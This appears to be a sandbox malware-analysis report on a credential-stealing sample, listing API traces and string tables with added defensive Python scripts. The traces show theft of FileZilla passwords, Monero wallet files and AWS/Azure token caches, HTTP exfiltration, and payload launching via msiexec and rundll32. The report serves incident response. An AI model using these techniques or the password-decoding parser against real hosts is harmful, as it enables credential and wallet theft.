                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: a7eb8c265139884f221fcf36834ad53756c1f191dbe399922e29c658a9363ae1
                                  • Instruction ID: 476361d4ba23ede9bd269f4d206fc875c425edf142cae5c0c0f8a9d31badaff4
                                  • Opcode Fuzzy Hash: a7eb8c265139884f221fcf36834ad53756c1f191dbe399922e29c658a9363ae1
                                  • Instruction Fuzzy Hash: 9FD13371D10218EBDB04EBF4ED9ADEE7778EF18301F408518F102A6192DF79AA05DB66
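The string table of this function (browser: FileZilla, profile: null, url:, login:, password:, the \AppData\Roaming\FileZilla\recentservers.xml path and the <Host>, <Port>, <User> and <Pass encoding="base64"> tags) shows it reading FileZilla's recent-servers file and base64-decoding the stored passwords before concatenating them into one record with lstrcat. The parser below is an added example written for this report, not code from the sample or from Joe Sandbox. It reads a constructed recentservers.xml and renders each entry in the same layout, which is what a responder needs to list exactly which FTP/SFTP credentials were exposed on the host. The sample XML, its hosts and its credentials are invented, and joining host and port with ':' for the url field is an assumption; the trace does not show how that value is built.

```python
"""Parse FileZilla's recentservers.xml the way the traced function does
(<Host>, <Port>, <User>, <Pass encoding="base64">) so an incident
responder can list exactly which FTP/SFTP credentials were exposed."""
import base64
import xml.etree.ElementTree as ET

# Constructed sample file, not taken from the analysed host.  The layout
# follows FileZilla 3.x; hostnames and credentials are invented.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>alice</User>
      <Logontype>5</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_recentservers(xml_text):
    """Return one dict per <Server>.  The password is decoded only when the
    <Pass> element carries encoding="base64"; key-based logons have no <Pass>
    at all, and a malformed base64 value yields None rather than garbage."""
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                try:
                    password = base64.b64decode(pass_el.text, validate=True).decode("utf-8", "replace")
                except ValueError:  # binascii.Error is a ValueError subclass
                    password = None
            else:
                # Older FileZilla builds wrote <Pass> without an encoding attribute, in the clear.
                password = pass_el.text
        entries.append({
            "host": server.findtext("Host", default=""),
            "port": server.findtext("Port", default=""),
            "login": server.findtext("User", default=""),
            "password": password,
        })
    return entries


def format_record(entry):
    """Render an entry in the 'browser:/profile:/url:/login:/password:' layout
    the string table shows being assembled with lstrcat.  Joining host and
    port with ':' for the url field is an assumption made for this example."""
    url = f"{entry['host']}:{entry['port']}" if entry["port"] else entry["host"]
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {url}",
        f"login: {entry['login']}",
        f"password: {entry['password'] or ''}",
    ])


if __name__ == "__main__":
    for e in parse_recentservers(SAMPLE_RECENTSERVERS):
        print(format_record(e), end="\n\n")
```

Point the parser at %APPDATA%\FileZilla\recentservers.xml (and sitemanager.xml, which uses the same <Server> layout) from a forensic image to get the rotation list; every entry with a non-empty password should be treated as compromised.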
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007159F8
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00715A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00715B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0122F628,00000000,?,0122AE60,00000000,?,00731A1C), ref: 00715E71
                                  • lstrlen.KERNEL32(00000000), ref: 00715E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00715E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00715E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00715EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00715ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00715EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00715F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00715F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00715F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00715FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00715FBD
                                  • HttpOpenRequestA.WININET(00000000,0122F668,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00715BF8
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00715FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 624cbe0b91215c9f4010ef9c113f8a0a37d863e86020245aa09cfb6733bf931e
                                  • Instruction ID: 4fc26e3b7d1c39a278243901c871472b30276d59268536c1baf63681c13476c6
                                  • Opcode Fuzzy Hash: 624cbe0b91215c9f4010ef9c113f8a0a37d863e86020245aa09cfb6733bf931e
                                  • Instruction Fuzzy Hash: 1F12C071920128FBDB15EBA0EC99FEEB378BF54700F5041A9F10662092DF786A49CF65
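The call sequence in this function (InternetOpenA with a NULL agent string, InternetConnectA with service type 3, HttpOpenRequestA with dwFlags 0x00400100, HttpSendRequestA, then InternetReadFile in 0xC7-byte chunks) is the sample's HTTP exchange with its server, and the string IDs made of '-' runs and '"' are what a hand-built multipart/form-data body looks like. The Python below is an added triage example, not code from the sample or from Joe Sandbox: it names the WinINet flag bits from the trace, flags the absent User-Agent that a NULL lpszAgent produces, and unpacks a multipart body from a captured request so the exfiltrated fields can be inventoried. The captured request, including its host, path, boundary and field names, is constructed for the example; the page only shows that the body is built from dash runs and quotes.

```python
"""Triage a captured HTTP POST of the kind this function emits through
InternetOpenA -> InternetConnectA -> HttpOpenRequestA -> HttpSendRequestA:
name the WinINet flags seen in the trace, flag the missing User-Agent, and
unpack a multipart/form-data body into its fields."""
import re

# Bits from wininet.h needed to read the HttpOpenRequestA call in the trace.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# nServerPort/dwService values for InternetConnectA (the trace passes 3).
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}


def decode_flags(dw_flags):
    """Name every known bit set in an HttpOpenRequestA dwFlags value."""
    return sorted(name for bit, name in INTERNET_FLAGS.items() if dw_flags & bit)


# Constructed capture for an offline run.  Host, path, boundary and field
# names are assumptions; only the multipart shape is suggested by the trace.
RAW_REQUEST = (
    b"POST /collect HTTP/1.1\r\n"
    b"Host: 203.0.113.10\r\n"
    b"Content-Type: multipart/form-data; boundary=------7f3e2a1c9b\r\n"
    b"Pragma: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
    b"--------7f3e2a1c9b\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"0123456789ABCDEF\r\n"
    b"--------7f3e2a1c9b\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"browser: FileZilla\nlogin: deploy\npassword: hunter2\n\r\n"
    b"--------7f3e2a1c9b--\r\n"
)


def split_request(raw):
    """Split a raw HTTP/1.1 request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def missing_user_agent(headers):
    """WinINet only adds a User-Agent header when InternetOpenA's lpszAgent is
    non-NULL; the trace passes 00000000, so the request goes out without one."""
    return "user-agent" not in headers


def parse_multipart(headers, body):
    """Return {field name: {"filename": str|None, "data": bytes}} from a
    multipart/form-data body, using the boundary declared in Content-Type."""
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not m:
        raise ValueError("not a multipart/form-data request")
    delimiter = b"--" + m.group(1).encode("latin-1")
    parts = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        part_head, _, part_body = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if part_body.endswith(b"\r\n"):      # CRLF that precedes the next delimiter
            part_body = part_body[:-2]
        name = re.search(rb'\bname="([^"]*)"', part_head)   # \b keeps 'filename=' out
        fname = re.search(rb'filename="([^"]*)"', part_head)
        if name:
            parts[name.group(1).decode("latin-1")] = {
                "filename": fname.group(1).decode("latin-1") if fname else None,
                "data": part_body,
            }
    return parts


if __name__ == "__main__":
    print("HttpOpenRequestA flags:", decode_flags(0x00400100))
    request_line, headers, body = split_request(RAW_REQUEST)
    print(request_line, "| no User-Agent:", missing_user_agent(headers))
    for field, part in parse_multipart(headers, body).items():
        print(f"{field!r} filename={part['filename']!r} {len(part['data'])} bytes")
```

A POST with no User-Agent is a weak signal on its own (many scripted clients omit it), so use it together with the destination and the multipart field names when writing a detection; the parser is what turns the captured body into a list of what actually left the host.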
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0071D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D208
                                  • lstrcat.KERNEL32(?,00731478), ref: 0071D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D22A
                                  • lstrcat.KERNEL32(?,0073147C), ref: 0071D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D24C
                                  • lstrcat.KERNEL32(?,00731480), ref: 0071D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D26E
                                  • lstrcat.KERNEL32(?,00731484), ref: 0071D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D290
                                  • lstrcat.KERNEL32(?,00731488), ref: 0071D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D2B2
                                  • lstrcat.KERNEL32(?,0073148C), ref: 0071D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D2D4
                                  • lstrcat.KERNEL32(?,00731490), ref: 0071D2E3
                                    • Part of subcall function 0072A820: lstrlen.KERNEL32(00714F05,?,?,00714F05,00730DDE), ref: 0072A82B
                                    • Part of subcall function 0072A820: lstrcpy.KERNEL32(00730DDE,00000000), ref: 0072A885
                                  • lstrlen.KERNEL32(?), ref: 0071D32A
                                  • lstrlen.KERNEL32(?), ref: 0071D339
                                    • Part of subcall function 0072AA70: StrCmpCA.SHLWAPI(01229B50,0071A7A7,?,0071A7A7,01229B50), ref: 0072AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: b93f62ce479b378d63b6f038834865d44cc4f84640b1c468f75fa6f3a0666044
                                  • Instruction ID: 8ef2aa2109226b3879d66b8f313d41a30f70bae0cb88e10958788ee4a50ba65c
                                  • Opcode Fuzzy Hash: b93f62ce479b378d63b6f038834865d44cc4f84640b1c468f75fa6f3a0666044
                                  • Instruction Fuzzy Hash: EBE12E71910218FBDB05EBA0ED9AEEE7378BF14301F504168F107A6092DE39AE45DB66
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0122E108,00000000,?,0073144C,00000000,?,?), ref: 0071CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0071CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0071CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0071CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0071CAD9
                                  • StrStrA.SHLWAPI(?,0122E168,00730B52), ref: 0071CAF7
                                  • StrStrA.SHLWAPI(00000000,0122E120), ref: 0071CB1E
                                  • StrStrA.SHLWAPI(?,0122E5E0,00000000,?,00731458,00000000,?,00000000,00000000,?,01229A90,00000000,?,00731454,00000000,?), ref: 0071CCA2
                                  • StrStrA.SHLWAPI(00000000,0122E800), ref: 0071CCB9
                                    • Part of subcall function 0071C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0071C871
                                    • Part of subcall function 0071C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0071C87C
                                  • StrStrA.SHLWAPI(?,0122E800,00000000,?,0073145C,00000000,?,00000000,01229AA0), ref: 0071CD5A
                                  • StrStrA.SHLWAPI(00000000,01229DC0), ref: 0071CD71
                                    • Part of subcall function 0071C820: lstrcat.KERNEL32(?,00730B46), ref: 0071C943
                                    • Part of subcall function 0071C820: lstrcat.KERNEL32(?,00730B47), ref: 0071C957
                                    • Part of subcall function 0071C820: lstrcat.KERNEL32(?,00730B4E), ref: 0071C978
                                  • lstrlen.KERNEL32(00000000), ref: 0071CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0071CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: da191e64bf8f452e458f2a9b589073baccb479c47735bdabec8cca2e4be53aad
                                  • Instruction ID: 92c5cf2ccb43bcb62c628a5a777ec4afd58a5b14355c2d9668cc1fd7c8c5384c
                                  • Opcode Fuzzy Hash: da191e64bf8f452e458f2a9b589073baccb479c47735bdabec8cca2e4be53aad
                                  • Instruction Fuzzy Hash: ECE1EF71D10118FBDB15EBA4EC9AFEEB778AF18300F404169F10667192DF386A4ACB65
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0122BFC8,00000000,00020019,00000000,007305B6), ref: 007283A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00728426
                                  • wsprintfA.USER32 ref: 00728459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0072847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0072848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00728499
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 3801f3b990ce2c7e5ffb91d055fa8ee009e32af7e6ecf29f525baac7c8bdd254
                                  • Instruction ID: 9e1e4f9c8d990b210fa8ce6d7fe3426dd1b2967331bb7182ed425e1fd81d1bc3
                                  • Opcode Fuzzy Hash: 3801f3b990ce2c7e5ffb91d055fa8ee009e32af7e6ecf29f525baac7c8bdd254
                                  • Instruction Fuzzy Hash: D8811DB1911228EBEB24DB50DC95FEAB7B8FF08700F0082D8E109A6141DF796B85CF95
                                  APIs
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00724DCD
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 0072492C
                                    • Part of subcall function 00724910: FindFirstFileA.KERNEL32(?,?), ref: 00724943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00724E59
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FDC), ref: 00724971
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FE0), ref: 00724987
                                    • Part of subcall function 00724910: FindNextFileA.KERNEL32(000000FF,?), ref: 00724B7D
                                    • Part of subcall function 00724910: FindClose.KERNEL32(000000FF), ref: 00724B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00724EE5
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 007249B0
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,007308D2), ref: 007249C5
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 007249E2
                                    • Part of subcall function 00724910: PathMatchSpecA.SHLWAPI(?,?), ref: 00724A1E
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,0122F5F8), ref: 00724A4A
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,00730FF8), ref: 00724A5C
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,?), ref: 00724A70
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,00730FFC), ref: 00724A82
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,?), ref: 00724A96
                                    • Part of subcall function 00724910: CopyFileA.KERNEL32(?,?,00000001), ref: 00724AAC
                                    • Part of subcall function 00724910: DeleteFileA.KERNEL32(?), ref: 00724B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 788b297a14a91b6f45a646341f5e3b16be3aa34c9a270e11f5330ef4ca18e1f9
                                  • Instruction ID: e3f8c5ce28b74d7a7b628205be38233d71652893d297b2e66a0ff7284cc95b68
                                  • Opcode Fuzzy Hash: 788b297a14a91b6f45a646341f5e3b16be3aa34c9a270e11f5330ef4ca18e1f9
                                  • Instruction Fuzzy Hash: 4641B9BAA50318A7D754F770EC4BFDD3338AB24700F404594B689660C2EEB95BC98B93
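The strings in this function (\.azure\, \.aws\, \.IdentityService\, msal.cache, *.*) together with SHGetFolderPathA, FindFirstFileA/FindNextFileA, PathMatchSpecA, CopyFileA and DeleteFileA show it collecting Azure CLI, AWS CLI and MSAL token-cache files from the user's profile and staging copies that it later deletes. The script below is an added incident-response example, not code from the sample or from Joe Sandbox: it walks the same three locations with the same patterns to list what a stealer running as that user could have read, and pulls the AWS access key ids out of the credentials file so they can be rotated. It builds a constructed profile tree with invented contents. Two assumptions are ours: the base directory is taken to be the user profile (the trace resolves it through SHGetFolderPathA, and the Azure and AWS CLIs write these directories under %USERPROFILE% by default), and *.* is treated as matching every file, the over-inclusive choice for scoping.

```python
"""Scope the cloud-credential files the traced function collects from the
user profile (\\.azure\\, \\.aws\\, \\.IdentityService\\ filtered with
PathMatchSpecA against *.* or msal.cache), and list the AWS access keys that
must be rotated if the host ran this sample."""
import configparser
import os
import tempfile
from datetime import datetime, timezone
from fnmatch import fnmatch

# Sub-directory and match pattern per target, from the function's string
# table.  The descriptive labels are ours.
TARGETS = [
    ("Azure CLI profile / token cache", ".azure", "*.*"),
    ("AWS CLI credentials / config", ".aws", "*.*"),
    ("MSAL shared token cache", ".IdentityService", "msal.cache"),
]


def win_match(name, pattern):
    """Win32-style wildcard match.  '*.*' is treated as 'every file', as
    FindFirstFileA does; this is deliberately over-inclusive for scoping,
    since the trace does not settle how PathMatchSpecA treats dotless names."""
    if pattern == "*.*":
        return True
    return fnmatch(name.lower(), pattern.lower())


def scan_profile(profile_dir, targets=TARGETS):
    """Return every regular file under the target dirs that the pattern selects."""
    found = []
    for label, subdir, pattern in targets:
        base = os.path.join(profile_dir, subdir)
        if not os.path.isdir(base):
            continue
        for name in sorted(os.listdir(base)):
            path = os.path.join(base, name)
            if os.path.isfile(path) and win_match(name, pattern):
                st = os.stat(path)
                found.append({
                    "what": label,
                    "path": path,
                    "size": st.st_size,
                    "mtime": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc).isoformat(timespec="seconds"),
                })
    return found


def aws_keys_to_rotate(credentials_path):
    """Profile name -> access key id, read from the INI-format AWS credentials file."""
    cp = configparser.ConfigParser()
    cp.read(credentials_path)
    return {s: cp[s]["aws_access_key_id"] for s in cp.sections() if "aws_access_key_id" in cp[s]}


def build_sample_profile():
    """Constructed profile tree for an offline run; all contents are invented.
    AKIAIOSFODNN7EXAMPLE is the placeholder key used in AWS documentation."""
    root = tempfile.mkdtemp(prefix="profile_")
    files = {
        (".azure", "azureProfile.json"): b'{"subscriptions": []}\n',
        (".azure", "msal_token_cache.bin"): b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf",
        (".aws", "credentials"): (b"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
                                  b"aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"),
        (".aws", "config"): b"[default]\nregion = eu-west-1\n",
        (".IdentityService", "msal.cache"): b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf",
        (".IdentityService", "msal.cache.nonce"): b"not selected by the msal.cache pattern",
    }
    for (sub, name), data in files.items():
        os.makedirs(os.path.join(root, sub), exist_ok=True)
        with open(os.path.join(root, sub, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    profile = build_sample_profile()
    for hit in scan_profile(profile):
        print(f"{hit['what']:32} {hit['size']:6d} {hit['mtime']} {hit['path']}")
    print("rotate:", aws_keys_to_rotate(os.path.join(profile, ".aws", "credentials")))
```

On a real case run scan_profile against the mounted user profile of every account that executed the sample; Azure and MSAL caches are protected with DPAPI, so an attacker who stole them while the user was logged on could already decrypt them, and the tokens inside should be revoked rather than assumed safe.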
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0072906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: c01e9c19e6cf0b8022ae7b53bc574f365414d4a06d2f0e39693f4939c016f45e
                                  • Instruction ID: b9647ce3f370a9ae38c5da1715fee5623fabfed7ffb14929dbae1dbde9ec1b5c
                                  • Opcode Fuzzy Hash: c01e9c19e6cf0b8022ae7b53bc574f365414d4a06d2f0e39693f4939c016f45e
                                  • Instruction Fuzzy Hash: 07711C71910208EBDB04DFE5DC89FEEB7B9BF48301F148608F615AB290DB38A944DB65
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007231C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0072335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007234EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 49307908df56df3dd6ae333c0b3820e9f769bcf03ddf07746b88523dd12f32f9
                                  • Instruction ID: 8374cf8294d2897125c6ce1024793e4c7cb9d9da5ffe8d82d457022391281a59
